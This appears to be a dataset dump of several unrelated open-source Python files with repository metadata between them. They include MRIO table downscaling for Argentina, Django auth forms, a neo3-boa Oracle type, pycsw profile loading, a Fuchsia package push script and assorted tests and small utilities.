proxy_trade = proxy_trade.loc[proxy_trade.sec2.isin(['L','M','N','O','P'])]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade.query("reg1 == reg2")
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_sec{}.csv'.format(sector)),index=False)
else:
proxy_trade = pd.DataFrame(columns=['year','gdp'],index= mi_index).reset_index()
proxy_trade['year'] = 2016
proxy_trade['gdp'] = 0
proxy_trade = proxy_trade.query("reg1 != reg2")
proxy_trade = proxy_trade.loc[proxy_trade.sec1 == sector]
proxy_trade = proxy_trade.loc[proxy_trade.sec2.isin(['L','M','N','O','P'])]
proxy_trade['sec1'] = proxy_trade.sec1.apply(change_name)
proxy_trade['sec2'] = proxy_trade.sec2.apply(change_name)
proxy_trade = proxy_trade.query("reg1 == reg2")
proxy_trade = proxy_trade[['year','sec1','reg1','sec2','reg2','gdp']]
proxy_trade.columns = ['year','sector','region','sector','region','gdp']
proxy_trade.to_csv(os.path.join('..','mrio_downscaling','proxy_trade_{}.csv'.format(sector)),index=False)
### run libmrio
p = subprocess.Popen([r'..\mrio_downscaling\mrio_disaggregate', 'settings_trade.yml'],
cwd=os.path.join('..','mrio_downscaling'))
p.wait()
# load data and reorder
region_names_list = [item for sublist in [[x]*(len(sectors)+2) for x in region_names]
for item in sublist]
rows = ([x for x in sectors+['VA','IMP']])*len(region_names)
cols = ([x for x in sectors+['FD','EXP']])*len(region_names)
index_mi = pd.MultiIndex.from_arrays([region_names_list, rows], names=('region', 'row'))
column_mi = pd.MultiIndex.from_arrays([region_names_list, cols], names=('region', 'col'))
MRIO = pd.read_csv(os.path.join('..','mrio_downscaling','output2.csv'),header=None,index_col=None)
MRIO.index = index_mi
MRIO.columns = column_mi
# create predefined index and col, which is easier to read
sector_only = [x for x in sectors]*len(region_names)
col_only = ['FD','EXP']*len(region_names)
region_col = [item for sublist in [[x]*len(sectors) for x in region_names] for item in sublist] + \
[item for sublist in [[x]*2 for x in region_names] for item in sublist]
column_mi_reorder = pd.MultiIndex.from_arrays(
[region_col, sector_only+col_only], names=('region', 'col'))
# sum va and imports
valueA = pd.DataFrame(MRIO.loc[MRIO.index.get_level_values(1) == 'VA'].sum(axis='index'))
valueA.columns = pd.MultiIndex.from_product([['Total'],['ValueA']],names=['region','row'])
IMP = pd.DataFrame(MRIO.loc[MRIO.index.get_level_values(1) == 'IMP'].sum(axis='index'))
IMP.columns = pd.MultiIndex.from_product([['Total'],['IMP']],names=['region','row'])
output = pd.concat([MRIO.loc[~MRIO.index.get_level_values(1).isin(['FD','EXP'])]])
output = output.drop(['VA','IMP'], level=1)
output = pd.concat([output,valueA.T,IMP.T])
output = output.reindex(column_mi_reorder, axis='columns')
mrio_arg = ras_method(np.array(output).T,np.array(list(output.sum(axis=1))[:384]+list(output.sum(axis=0)[-48:])),
np.array(list(output.sum(axis=1))[:384]+[output.loc[('Total','ValueA'),:].sum(),output.loc[('Total','IMP'),:].sum()]),
eps=1e-3,print_out=print_output)
mrio_argentina = pd.DataFrame(mrio_arg.T,index=output.index,columns=output.columns)
mrio_argentina.to_csv(os.path.join(data_path,'MRIO','MRIO_Argentina_{}_{}.csv'.format(table,year)))
if print_progress:
print('NOTE : Balanced MRIO table with trade finished using {} data'.format(table))
def prepare_table_mria(table='INDEC',year='2015',print_output=True):
"""
Convert MRIO table to an excel file in which all elements of the table are disaggregated.
"""
data_path = os.path.join('..','data')
# load table
MRIO = pd.read_csv(os.path.join(data_path,'MRIO','MRIO_Argentina_{}_{}.csv'.format(table,year)),index_col=[0,1],header=[0,1])
Xnew = MRIO.copy()
Xnew = Xnew+1e-6
# write to excel
writer = pd.ExcelWriter(os.path.join(data_path,'MRIO', 'mrio_argentina_disaggregated_{}_{}.xlsx'.format(table,year)))
# write T
df_T = Xnew.iloc[:384, :384]
df_T.columns = df_T.columns.droplevel()
df_labels_T = pd.DataFrame(df_T.reset_index()[['region', 'row']])
df_T.reset_index(inplace=True, drop=True)
df_T.to_excel(writer, 'T', index=False, header=False)
df_labels_T.to_excel(writer, 'labels_T', index=False, header=False)
# write FD
df_FD = Xnew.iloc[:384, 384:].iloc[:, Xnew.iloc[:384, 384:].columns.get_level_values(1)=='FD']
df_labels_FD = pd.DataFrame(list(df_FD.columns))
df_FD.columns = df_FD.columns.droplevel()
df_FD.reset_index(inplace=True, drop=True)
df_FD.to_excel(writer, 'FD', index=False, header=False)
df_labels_FD.to_excel(writer, 'labels_FD', index=False, header=False)
# write ExpROW
df_ExpROW = pd.DataFrame(Xnew.iloc[:384, 384:].iloc[:, Xnew.iloc[:384, 384:].columns.get_level_values(1)=='EXP'].sum(axis=1))
df_labels_ExpROW = pd.DataFrame(['Export'])
df_ExpROW.reset_index(inplace=True, drop=True)
df_ExpROW.to_excel(writer, 'ExpROW', index=False, header=False)
df_labels_ExpROW.reset_index(inplace=True, drop=True)
df_labels_ExpROW.columns = ['Export']
df_labels_ExpROW.to_excel(writer, 'labels_ExpROW', index=False, header=False)
# write VA
df_VA = pd.DataFrame(Xnew.iloc[384:, :409].T[('Total', 'ValueA')])
df_VA.columns = ['VA']
df_VA['imports'] = pd.DataFrame(Xnew.iloc[384:, :].T[('Total', 'IMP')])
df_VA.reset_index(inplace=True, drop=True)
df_VA.to_excel(writer, 'VA', index=False, header=False)
df_labels_VA = pd.DataFrame(['Import', 'VA']).T
df_labels_VA.to_excel(writer, 'labels_VA', index=False, header=False)
# save excel
writer.save()
if print_output:
print('NOTE : MRIO table ready to use for MRIA model using {} data'.format(table))
if __name__ == "__main__":
estimate(table='GTAP',year='2014',print_output=True)
prepare_table_mria(table='GTAP',year='2014',print_output=True)
| 49.24557
| 154
| 0.635359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,979
| 0.255963
|
421c88021499b88620b09442779453fef21cf565
| 1,212
|
py
|
Python
|
task_manager/users/forms.py
|
Ritesh-Aggarwal/Task-Manager-Django
|
b8f8df10b0b0a9cc9cd27346a0b5d4d5892d2f24
|
[
"MIT"
] | null | null | null |
task_manager/users/forms.py
|
Ritesh-Aggarwal/Task-Manager-Django
|
b8f8df10b0b0a9cc9cd27346a0b5d4d5892d2f24
|
[
"MIT"
] | null | null | null |
task_manager/users/forms.py
|
Ritesh-Aggarwal/Task-Manager-Django
|
b8f8df10b0b0a9cc9cd27346a0b5d4d5892d2f24
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import (
AuthenticationForm,
UserCreationForm,
UsernameField,
)
User = get_user_model()
class UserLoginForm(AuthenticationForm):
def __init__(self, *args, **kwargs):
super(UserLoginForm, self).__init__(*args, **kwargs)
username = UsernameField(widget=forms.TextInput(
attrs={'class': 'bg-gray-100 rounded-lg p-2'}))
password = forms.CharField(widget=forms.PasswordInput(
attrs={
'class': 'bg-gray-100 rounded-lg p-2',
}
))
class UserSignUpForm(UserCreationForm):
def __init__(self, *args, **kwargs):
super(UserSignUpForm, self).__init__(*args, **kwargs)
username = forms.CharField(
widget=forms.TextInput(attrs={"class": "bg-gray-100 rounded-lg p-2"})
)
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={
"class": "bg-gray-100 rounded-lg p-2",
}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={
"class": "bg-gray-100 rounded-lg p-2",
}
)
)
| 26.347826
| 77
| 0.605611
| 1,002
| 0.826733
| 0
| 0
| 0
| 0
| 0
| 0
| 175
| 0.144389
|
421cd1f840cd074e3eb92df46eaaf5c4a3768113
| 1,891
|
py
|
Python
|
boa3/model/builtin/interop/oracle/oracletype.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3/model/builtin/interop/oracle/oracletype.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3/model/builtin/interop/oracle/oracletype.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from __future__ import annotations
from typing import Any, Dict, Optional
from boa3.model.method import Method
from boa3.model.property import Property
from boa3.model.type.classes.classarraytype import ClassArrayType
from boa3.model.variable import Variable
class OracleType(ClassArrayType):
"""
A class used to represent Oracle class
"""
def __init__(self):
super().__init__('Oracle')
self._variables: Dict[str, Variable] = {}
self._class_methods: Dict[str, Method] = {}
self._constructor: Method = None
@property
def instance_variables(self) -> Dict[str, Variable]:
return self._variables.copy()
@property
def class_variables(self) -> Dict[str, Variable]:
return {}
@property
def properties(self) -> Dict[str, Property]:
return {}
@property
def static_methods(self) -> Dict[str, Method]:
return {}
@property
def class_methods(self) -> Dict[str, Method]:
# avoid recursive import
from boa3.model.builtin.interop.oracle.oraclegetpricemethod import OracleGetPriceMethod
from boa3.model.builtin.interop.oracle.oraclerequestmethod import OracleRequestMethod
if len(self._class_methods) == 0:
self._class_methods = {
'get_price': OracleGetPriceMethod(),
'request': OracleRequestMethod()
}
return self._class_methods
@property
def instance_methods(self) -> Dict[str, Method]:
return {}
def constructor_method(self) -> Optional[Method]:
return self._constructor
@classmethod
def build(cls, value: Any = None) -> OracleType:
if value is None or cls._is_type_of(value):
return _Oracle
@classmethod
def _is_type_of(cls, value: Any):
return isinstance(value, OracleType)
_Oracle = OracleType()
| 27.014286
| 95
| 0.657324
| 1,602
| 0.847171
| 0
| 0
| 1,170
| 0.61872
| 0
| 0
| 106
| 0.056055
|
42228f1e28d8899ed8da922c4eb2bd3b92ca4e69
| 191
|
py
|
Python
|
photo-hub/api/pagination.py
|
RodionChachura/photo-hub
|
20ec008076a34cb09b289fda0557e2efc7e06232
|
[
"MIT"
] | null | null | null |
photo-hub/api/pagination.py
|
RodionChachura/photo-hub
|
20ec008076a34cb09b289fda0557e2efc7e06232
|
[
"MIT"
] | null | null | null |
photo-hub/api/pagination.py
|
RodionChachura/photo-hub
|
20ec008076a34cb09b289fda0557e2efc7e06232
|
[
"MIT"
] | null | null | null |
from rest_framework.pagination import PageNumberPagination
class StandardPagination(PageNumberPagination):
page_size = 30
page_size_query_param = 'page_size'
max_page_size = 1000
| 31.833333
| 58
| 0.811518
| 131
| 0.685864
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.057592
|
4222c98b7de332bf9b4c1cc8bba790b9eea99314
| 1,021
|
py
|
Python
|
wiiu.py
|
RN-JK/UBIART-Texture-Decoder
|
71e190c12b1b8813dcda1f26cd115d9f89cc7619
|
[
"MIT"
] | null | null | null |
wiiu.py
|
RN-JK/UBIART-Texture-Decoder
|
71e190c12b1b8813dcda1f26cd115d9f89cc7619
|
[
"MIT"
] | null | null | null |
wiiu.py
|
RN-JK/UBIART-Texture-Decoder
|
71e190c12b1b8813dcda1f26cd115d9f89cc7619
|
[
"MIT"
] | 1
|
2021-11-29T05:57:55.000Z
|
2021-11-29T05:57:55.000Z
|
import os, glob
try:
os.mkdir("output")
except:
pass
wiiudir="input/wiiu"
try:
os.makedirs(wiiudir)
print('The directories have been made.')
input('Insert your textures in input/wiiu and then run the tool again to convert it.')
except:
pass
dir = 'input/temp'
try:
os.makedirs(dir)
except:
pass
try:
for ckdtextures in os.listdir(wiiudir):
with open(wiiudir+'/'+ckdtextures,'rb') as f:
f.read(44)
data = f.read()
dds=open('input/temp/'+ckdtextures.replace('.tga.ckd','.gtx').replace('.png.ckd','.gtx'),'wb')
dds.write(data)
dds.close()
except:
pass
try:
for gtx in os.listdir(dir):
print('making '+gtx.replace(".gtx","")+'...')
os.system("texconv2 -i input/temp/"+gtx+" -o output/"+gtx.replace(".gtx",".dds"))
except:
pass
filelist = glob.glob(os.path.join(dir, "*"))
for f in filelist:
os.remove(f)
os.rmdir(dir)
| 18.563636
| 103
| 0.5524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 275
| 0.269344
|
4223f6babdeae509fede80d613a39bd2530fc8ee
| 470
|
py
|
Python
|
jp.atcoder/abc046/arc062_a/8984820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc046/arc062_a/8984820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc046/arc062_a/8984820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import sys
n = int(sys.stdin.readline().rstrip())
ab = map(int, sys.stdin.read().split())
ab = list(zip(ab, ab))
def main():
c_a = ab[0][0]
c_b = ab[0][1]
for a, b in ab[1:]:
ratio = a / b
while c_a / c_b != ratio:
if c_a / c_b < ratio:
c_a += 1
else:
c_b += 1
ans = c_a + c_b
return ans
if __name__ == "__main__":
ans = main()
print(ans)
| 18.076923
| 40
| 0.431915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.021277
|
422402f1cd18573550063c08ebfde34d14018e34
| 5,187
|
py
|
Python
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 118
|
2015-01-07T00:24:09.000Z
|
2022-03-19T15:35:43.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 319
|
2015-01-06T23:51:46.000Z
|
2022-03-20T11:22:57.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 113
|
2015-01-07T00:42:23.000Z
|
2022-02-19T18:05:08.000Z
|
# -*- coding: utf-8 -*-
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
# Angelos Tzotsos <tzotsos@gmail.com>
#
# Copyright (c) 2015 Tom Kralidis
# Copyright (c) 2015 Angelos Tzotsos
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import os
import warnings
class Profile(object):
''' base Profile class '''
def __init__(self, name, version, title, url,
namespace, typename, outputschema, prefixes, model, core_namespaces,
added_namespaces,repository):
''' Initialize profile '''
self.name = name
self.version = version
self.title = title
self.url = url
self.namespace = namespace
self.typename = typename
self.outputschema = outputschema
self.prefixes = prefixes
self.repository = repository
if 'DescribeRecord' in model['operations']:
model['operations']['DescribeRecord']['parameters']\
['typeName']['values'].append(self.typename)
model['operations']['GetRecords']['parameters']['outputSchema']\
['values'].append(self.outputschema)
model['operations']['GetRecords']['parameters']['typeNames']\
['values'].append(self.typename)
model['operations']['GetRecordById']['parameters']['outputSchema']\
['values'].append(self.outputschema)
if 'Harvest' in model['operations']:
model['operations']['Harvest']['parameters']['ResourceType']\
['values'].append(self.outputschema)
# namespaces
core_namespaces.update(added_namespaces)
# repository
model['typenames'][self.typename] = self.repository
def extend_core(self, model, namespaces, config):
''' Extend config.model and config.namespaces '''
raise NotImplementedError
def check_parameters(self):
''' Perform extra parameters checking.
Return dict with keys "locator", "code", "text" or None '''
raise NotImplementedError
def get_extendedcapabilities(self):
''' Return ExtendedCapabilities child as lxml.etree.Element '''
raise NotImplementedError
def get_schemacomponents(self):
''' Return schema components as lxml.etree.Element list '''
raise NotImplementedError
def check_getdomain(self, kvp):
'''Perform extra profile specific checks in the GetDomain request'''
raise NotImplementedError
def write_record(self, result, esn, outputschema, queryables):
''' Return csw:SearchResults child as lxml.etree.Element '''
raise NotImplementedError
def transform2dcmappings(self, queryables):
''' Transform information model mappings into csw:Record mappings '''
raise NotImplementedError
def load_profiles(path, cls, profiles):
''' load CSW profiles, return dict by class name '''
def look_for_subclass(modulename):
module = __import__(modulename)
dmod = module.__dict__
for modname in modulename.split('.')[1:]:
dmod = dmod[modname].__dict__
for key, entry in dmod.items():
if key == cls.__name__:
continue
try:
if issubclass(entry, cls):
aps['plugins'][key] = entry
except TypeError:
continue
aps = {}
aps['plugins'] = {}
aps['loaded'] = {}
for prof in profiles.split(','):
# fgdc, atom, dif, gm03 are supported in core
# no need to specify them explicitly anymore
# provide deprecation warning
# https://github.com/geopython/pycsw/issues/118
if prof in ['fgdc', 'atom', 'dif', 'gm03']:
warnings.warn('%s is now a core module, and does not need to be'
' specified explicitly. So you can remove %s from '
'server.profiles' % (prof, prof))
else:
modulename='%s.%s.%s' % (path.replace(os.sep, '.'), prof, prof)
look_for_subclass(modulename)
return aps
| 36.528169
| 78
| 0.630037
| 2,480
| 0.478118
| 0
| 0
| 0
| 0
| 0
| 0
| 2,669
| 0.514556
|
4224f59023f612daa74db320160910b42cc05439
| 3,897
|
py
|
Python
|
push-package.py
|
OpenTrustGroup/scripts
|
31ca2ca5bae055113c6f92a2eb75b0c7528902b3
|
[
"BSD-3-Clause"
] | null | null | null |
push-package.py
|
OpenTrustGroup/scripts
|
31ca2ca5bae055113c6f92a2eb75b0c7528902b3
|
[
"BSD-3-Clause"
] | null | null | null |
push-package.py
|
OpenTrustGroup/scripts
|
31ca2ca5bae055113c6f92a2eb75b0c7528902b3
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2017 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import errno
import json
import os
import subprocess
import sys
import tempfile
DEFAULT_DST_ROOT = '/system'
DEFAULT_OUT_DIR = 'out/debug-x64'
def netaddr_cmd(out_dir, device):
path = os.path.join(out_dir, '../build-zircon/tools/netaddr')
command = [
path,
'--fuchsia',
device,
]
return command
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def parse_package_manifest(paths, dst_root):
data = []
for path in paths:
with open(path) as package_manifest:
for line in package_manifest:
items = line.rstrip().split('=')
if len(items) != 2:
raise ValueError('Malformed manifest entry: ' + line)
dst = os.path.join(dst_root, items[0].lstrip('/'))
src = items[1]
data.append([dst, src])
return data
def update_device(device, batch_file, verbose, out_dir):
ssh_config_path = os.path.join(out_dir, 'ssh-keys', 'ssh_config')
try:
netaddr = netaddr_cmd(out_dir, device)
ipv6 = '[' + subprocess.check_output(netaddr).strip() + ']'
except subprocess.CalledProcessError:
# netaddr prints its own errors, no need to add another one here.
return 1
with open(os.devnull, 'w') as devnull:
status = subprocess.call(
['sftp', '-F', ssh_config_path, '-b', batch_file, ipv6],
stdout=sys.stdout if verbose else devnull)
if status != 0:
print >> sys.stderr, 'error: sftp failed'
return status
def scp_everything(devices, package_data, out_dir, name_filter, verbose):
# Temporary file for sftp
count = 0
with tempfile.NamedTemporaryFile() as f:
# Create a directory tree that mirrors what we want on the device.
for entry in package_data:
dst_path = entry[0]
src_path = entry[1]
if name_filter is not None and name_filter not in os.path.basename(
dst_path):
continue
# must "rm" the file first because memfs requires it
print >> f, '-rm %s' % dst_path
print >> f, 'put -P %s %s' % (src_path, dst_path)
count += 1
f.flush()
for device in devices:
if update_device(device, f.name, verbose, out_dir) == 0:
print 'Updated %d files on "%s".' % (count, device)
else:
print 'Update FAILED on "%s"' % device
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'package_files',
nargs='+',
help='Files containing manifest data. For example, ' \
'(e.g. out/debug-x64/package/modular*/system_manifest)')
parser.add_argument('-d', '--device', default=[':'], help='Device to update')
parser.add_argument(
'-o',
'--out-dir',
metavar='DIR',
default=DEFAULT_OUT_DIR,
help='Directory containing build products')
parser.add_argument(
'-t',
'--dst-root',
metavar='PATH',
default=DEFAULT_DST_ROOT,
help='Path on device to the directory to copy package products')
parser.add_argument(
'-f',
'--filter',
metavar='FILTER',
help='Push products with a name that contains FILTER')
parser.add_argument(
'-v', '--verbose', action='store_true', help='Display copy filenames')
args = parser.parse_args()
out_dir = args.out_dir or DEFAULT_OUT_DIR
dst_root = args.dst_root or DEFAULT_DST_ROOT
name_filter = args.filter
verbose = args.verbose
package_data = parse_package_manifest(args.package_files, dst_root)
return scp_everything(args.device, package_data, out_dir, name_filter,
verbose)
if __name__ == '__main__':
sys.exit(main())
| 26.691781
| 79
| 0.647164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,060
| 0.272004
|
42260da2bac2d4e5c90292ee2d38da85618b72ad
| 2,355
|
py
|
Python
|
tests/e2e/registry/test_registry_image_push_pull.py
|
OdedViner/ocs-ci
|
e8a3de82650e02cf8fa67284a67c36ced34a480b
|
[
"MIT"
] | null | null | null |
tests/e2e/registry/test_registry_image_push_pull.py
|
OdedViner/ocs-ci
|
e8a3de82650e02cf8fa67284a67c36ced34a480b
|
[
"MIT"
] | null | null | null |
tests/e2e/registry/test_registry_image_push_pull.py
|
OdedViner/ocs-ci
|
e8a3de82650e02cf8fa67284a67c36ced34a480b
|
[
"MIT"
] | null | null | null |
import logging
import pytest
from ocs_ci.framework.testlib import workloads, E2ETest, ignore_leftovers
from ocs_ci.ocs import ocp, registry, constants
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import UnexpectedBehaviour
logger = logging.getLogger(__name__)
class TestRegistryImagePullPush(E2ETest):
"""
Test to check Image push and pull worked with registry backed by OCS
"""
@workloads
@ignore_leftovers
@pytest.mark.polarion_id("OCS-1080")
@pytest.mark.skip("Skip this test due to https://github.com/red-hat-storage/ocs-ci/issues/1547")
def test_registry_image_pull_push(self):
"""
Test case to validate registry image pull and push with OCS backend
"""
image_url = 'docker.io/library/busybox'
# Get openshift registry route and certificate access
registry.enable_route_and_create_ca_for_registry_access()
# Add roles to user so that user can perform image pull and push to registry
role_type = ['registry-viewer', 'registry-editor',
'system:registry', 'admin', 'system:image-builder']
for role in role_type:
registry.add_role_to_user(role_type=role, user=config.RUN['username'])
# Provide write access to registry
ocp_obj = ocp.OCP()
read_only_cmd = (
f"set env deployment.apps/image-registry"
f" REGISTRY_STORAGE_MAINTENANCE_READONLY- -n "
f"{constants.OPENSHIFT_IMAGE_REGISTRY_NAMESPACE}"
)
ocp_obj.exec_oc_cmd(read_only_cmd)
# Pull image using podman
registry.image_pull(image_url=image_url)
# Push image to registry using podman
registry.image_push(
image_url=image_url, namespace=constants.OPENSHIFT_IMAGE_REGISTRY_NAMESPACE
)
# List the images in registry
img_list = registry.image_list_all()
logger.info(f"Image list {img_list}")
# Check either image present in registry or not
validate = registry.check_image_exists_in_registry(image_url=image_url)
if not validate:
raise UnexpectedBehaviour("Image URL not present in registry")
# Remove user roles from User
for role in role_type:
registry.remove_role_from_user(role_type=role, user=config.RUN['username'])
| 36.796875
| 100
| 0.6862
| 2,073
| 0.880255
| 0
| 0
| 1,937
| 0.822505
| 0
| 0
| 914
| 0.38811
|
42274dc240f54ea288091543468dd2eda53a4feb
| 55
|
py
|
Python
|
tOYOpy/settings.py
|
fkab/tOYO
|
b0a7be760a45edd795b8734ce2e5f1ccec35091b
|
[
"MIT"
] | null | null | null |
tOYOpy/settings.py
|
fkab/tOYO
|
b0a7be760a45edd795b8734ce2e5f1ccec35091b
|
[
"MIT"
] | null | null | null |
tOYOpy/settings.py
|
fkab/tOYO
|
b0a7be760a45edd795b8734ce2e5f1ccec35091b
|
[
"MIT"
] | null | null | null |
elements = {
'em': '',
'blockquote': '<br/>'
}
| 11
| 25
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.454545
|
4227bfd2b04f47e94ab893e1b523dca4551e38fc
| 312
|
py
|
Python
|
1.6.py
|
kevrodg/pynet
|
5142b1b75cda658a99348e3550da1c198e7d049e
|
[
"Apache-2.0"
] | null | null | null |
1.6.py
|
kevrodg/pynet
|
5142b1b75cda658a99348e3550da1c198e7d049e
|
[
"Apache-2.0"
] | null | null | null |
1.6.py
|
kevrodg/pynet
|
5142b1b75cda658a99348e3550da1c198e7d049e
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import json
import yaml
my_list = [0, 1, 2, 3, 'whatever', 'hello', {'attribs': [0, 1, 2, 3, 4], 'ip_addr': '10.10.10.239'}]
with open("my_file.json", "w") as f:
json.dump(my_list, f)
with open("my_file.yaml", "w") as f:
f.write(yaml.dump(my_list, default_flow_style=False))
| 20.8
| 101
| 0.61859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 104
| 0.333333
|
42287378bd11599427298e72d96640a19c6fbb44
| 322
|
py
|
Python
|
jp.atcoder/abc069/arc080_a/11903517.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc069/arc080_a/11903517.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc069/arc080_a/11903517.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import sys
n, *a = map(int, sys.stdin.read().split())
def main():
c4 = c2 = 0
for x in a:
if not x % 4:
c4 += 1
elif not x % 2:
c2 += 1
ans = "Yes" if c4 >= n // 2 or c4 * 2 + c2 >= n else "No"
print(ans)
if __name__ == "__main__":
main()
| 16.947368
| 62
| 0.406832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 19
| 0.059006
|
422874e1c950eddb051f58c230d75405855070fc
| 2,277
|
py
|
Python
|
tests/test_url_enc_dec.py
|
FWidm/poe-profile
|
08190dfab88758081ce1ddcd30a43081e2d7863f
|
[
"MIT"
] | 1
|
2018-12-02T19:48:09.000Z
|
2018-12-02T19:48:09.000Z
|
tests/test_url_enc_dec.py
|
FWidm/poe-profile
|
08190dfab88758081ce1ddcd30a43081e2d7863f
|
[
"MIT"
] | null | null | null |
tests/test_url_enc_dec.py
|
FWidm/poe-profile
|
08190dfab88758081ce1ddcd30a43081e2d7863f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
import sys
import unittest
from src.util.tree_codec import encode_hashes, decode_url
url = 'AAAABAMDAQQHBLMGSQj0Dc0OPA5cES0UIBRxFScWbxhWGF0YkRo4HM4c3CSqJy8o-itQLJwy0TWSNuk6UjpYOuE8LUGHRARFR0V-RZ1Ms025TeNQR' \
'1NSVcZZ81qRXz9mnmebaGVodGpDaqxq-mvbcg9yqXasfIN99YIHgseDX4PMg9uFYIhAjLGOvo8akDOQVZLBmK2a4JuKogCmV6asqH2qxKyYrKqtja' \
'3xrj6vp7c-uJO8n7zqvk_AZsT2xq7MvM9-0B_Tj9P72L3ZXtl82mLfsONq5FHqGOvu7IPsiu8O7-vwH_JF8933MvfX-Ov56PrS_Ev-Cv5U_oH-jw=='
decoded = (4, 3, 3, 1, [1031, 1203, 1609, 2292, 3533, 3644, 3676, 4397, 5152, 5233, 5415, 5743, 6230, 6237, 6289,
6712,
7374, 7388, 9386, 10031, 10490, 11088, 11420, 13009, 13714, 14057, 14930, 14936, 15073,
15405,
16775, 17412, 17735, 17790, 17821, 19635, 19897, 19939, 20551, 21330, 21958, 23027, 23185,
24383,
26270, 26523, 26725, 26740, 27203, 27308, 27386, 27611, 29199, 29353, 30380, 31875, 32245,
33287,
33479, 33631, 33740, 33755, 34144, 34880, 36017, 36542, 36634, 36915, 36949, 37569, 39085,
39648,
39818, 41472, 42583, 42668, 43133, 43716, 44184, 44202, 44429, 44529, 44606, 44967, 46910,
47251,
48287, 48362, 48719, 49254, 50422, 50862, 52412, 53118, 53279, 54159, 54267, 55485, 55646,
55676,
55906, 57264, 58218, 58449, 59928, 60398, 60547, 60554, 61198, 61419, 61471, 62021, 62429,
63282,
63447, 63723, 63976, 64210, 64587, 65034, 65108, 65153, 65167])
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_encode(self):
result = encode_hashes(decoded[0],decoded[1],decoded[2],decoded[3],decoded[4])
print(result)
print(url)
